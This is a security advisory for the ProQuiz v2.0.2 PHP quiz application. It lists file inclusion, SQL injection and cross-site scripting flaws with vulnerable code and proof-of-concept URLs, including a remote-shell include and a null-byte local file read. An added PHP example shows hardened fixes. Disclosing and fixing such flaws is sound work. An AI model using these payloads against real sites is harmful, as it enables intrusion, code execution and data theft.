Title: ProQuiz v2.0.2 - Multiple Vulnerabilities
Author: L0n3ly-H34rT (l0n3ly_h34rt@hotmail.com)
Mirror: http://www.2cto.com/
Vendor homepage: http://proquiz.softon.org/
Download: http://code.google.com/p/proquiz/downloads/list
Tested on: Linux / Windows

-----------------------------------------------------------------------

1. Remote File Inclusion

* In file my_account.php, lines 114 & 115:

    if($_GET['action']=='getpage' && !empty($_GET['page'])){
      @include_once($_GET['page'].'.php');

  The page parameter is taken straight from the query string and handed to include_once with ".php" appended; nothing restricts it to a local page name.

* P.O.C.:
  First register and log in to your panel, then request a URL such as:

    http://www.2cto.com/full/my_account.php?action=getpage&page=http://127.0.0.1/shell.txt?

  The trailing "?" turns the appended ".php" into a query string of the remote URL, so the remote file is fetched and included as-is.

* Note: requires allow_url_include=On.

-----------------------------------------------------------------------

2. Local File Inclusion

* In file my_account.php, lines 114 & 115 (same code as above):

    if($_GET['action']=='getpage' && !empty($_GET['page'])){
      @include_once($_GET['page'].'.php');

* P.O.C.:
  First register and log in to your panel, then request a URL such as:

    http://www.2cto.com/full/my_account.php?action=getpage&page=windows/win.ini%00.jpg

  The %00 truncates the path before the appended ".php" so an arbitrary local file is included.

* Note: likewise requires magic_quotes_gpc = Off (otherwise the null byte is escaped). Null-byte truncation of include paths also only works on PHP versions before 5.3.4, which reject paths containing a null byte.

-----------------------------------------------------------------------

3. Remote SQL Injection & Blind SQL Injection

* In two files:

  A) answers.php, line 55:

    <?php echo $_GET['instid']; ?>

  (this is also the unencoded reflection of instid behind item 4)

  B) functions.php, the parameters:

    $_POST['email']
    $_POST['username']

* P.O.C.:

  A) http://www.2cto.com/full/answers.php?action=answers&instid=[SQL]

  B) Email:
     URL: http://127.0.0.1/full/functions.php?action=recoverpass
     Inject here via POST: email=[SQL]

     Username:
     URL: http://127.0.0.1/full/functions.php?action=edit_profile&type=username
     Inject here via POST: username=[SQL]

-----------------------------------------------------------------------

4. Cross Site Scripting

* e.g.:

    http://127.0.0.1/full/answers.php?action=answers&instid=[XSS]

-----------------------------------------------------------------------

# Greetz to my friendz
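The advisory does not include fixes. The following is an added example, written for this page and not taken from ProQuiz or its author, showing how the three sinks it names (the getpage include, the instid/email/username queries, and the raw echo of instid) would be hardened. Page names, file paths, table and column names, and the function names are assumptions; the script runs stand-alone against an in-memory SQLite database populated with constructed rows.

```php
<?php
// Added example, not ProQuiz code. Hardened replacements for the three sinks
// named in the advisory. Page names, paths, table and column names are assumed.

declare(strict_types=1);

// --- 1. my_account.php?action=getpage&page=... ---------------------------
// The original does `@include_once($_GET['page'].'.php')`. Mapping the
// parameter through a fixed allow-list makes the request string a lookup key
// only: "http://..." (RFI) and "...\0.jpg" (LFI) simply miss the list and
// never reach include_once().
const PAGE_ALLOWLIST = [                       // assumed page names and paths
    'profile'  => __DIR__ . '/pages/profile.php',
    'results'  => __DIR__ . '/pages/results.php',
    'settings' => __DIR__ . '/pages/settings.php',
];

function resolve_page(string $page): ?string
{
    // null means "not a known page": the caller answers 404 and includes nothing
    return PAGE_ALLOWLIST[$page] ?? null;
}

// --- 2. answers.php?instid= and functions.php email / username -----------
// Prepared statements keep the value out of the SQL text. instid is assumed
// to be a numeric id, so anything that is not all digits is rejected early.
function fetch_answers(PDO $pdo, string $instid): array
{
    if (!ctype_digit($instid)) {
        return [];
    }
    $stmt = $pdo->prepare('SELECT id, answer FROM answers WHERE instid = :instid');
    $stmt->bindValue(':instid', (int) $instid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function find_user_by_email(PDO $pdo, string $email): ?array
{
    // used by the recoverpass action: the email is bound, never concatenated
    $stmt = $pdo->prepare('SELECT id, username FROM users WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- 3. answers.php line 55: <?php echo $_GET['instid']; ?> --------------
// Encode for the HTML context before echoing any request parameter.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// --- Demo against an in-memory SQLite database with constructed rows ------
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE answers (id INTEGER, instid INTEGER, answer TEXT)');
$pdo->exec("INSERT INTO answers VALUES (1, 7, 'yes'), (2, 8, 'no')");
$pdo->exec('CREATE TABLE users (id INTEGER, username TEXT, email TEXT)');
$pdo->exec("INSERT INTO users VALUES (1, 'alice', 'alice@example.com')");

// allow-listed page resolves; the advisory's RFI and LFI payloads do not
var_dump(resolve_page('profile'));
var_dump(resolve_page('http://127.0.0.1/shell.txt?'));
var_dump(resolve_page("windows/win.ini\0.jpg"));

// a real id returns its row; an injection string returns nothing
var_dump(fetch_answers($pdo, '7'));
var_dump(fetch_answers($pdo, '7 OR 1=1'));

// the classic tautology is matched literally against the email column
var_dump(find_user_by_email($pdo, "x' OR '1'='1"));
var_dump(find_user_by_email($pdo, 'alice@example.com'));

// the reflected parameter is rendered as text, not markup
echo h('<script>alert(1)</script>'), PHP_EOL;
```

In the getpage handler the pattern is `$file = resolve_page($_GET['page'] ?? ''); if ($file === null) { http_response_code(404); exit; } include_once $file;`. The allow-list approach is deliberately stricter than basename() or ".." stripping: the attacker-controlled string never becomes part of a filesystem path at all, so allow_url_include, magic_quotes_gpc and the PHP version stop mattering for this sink.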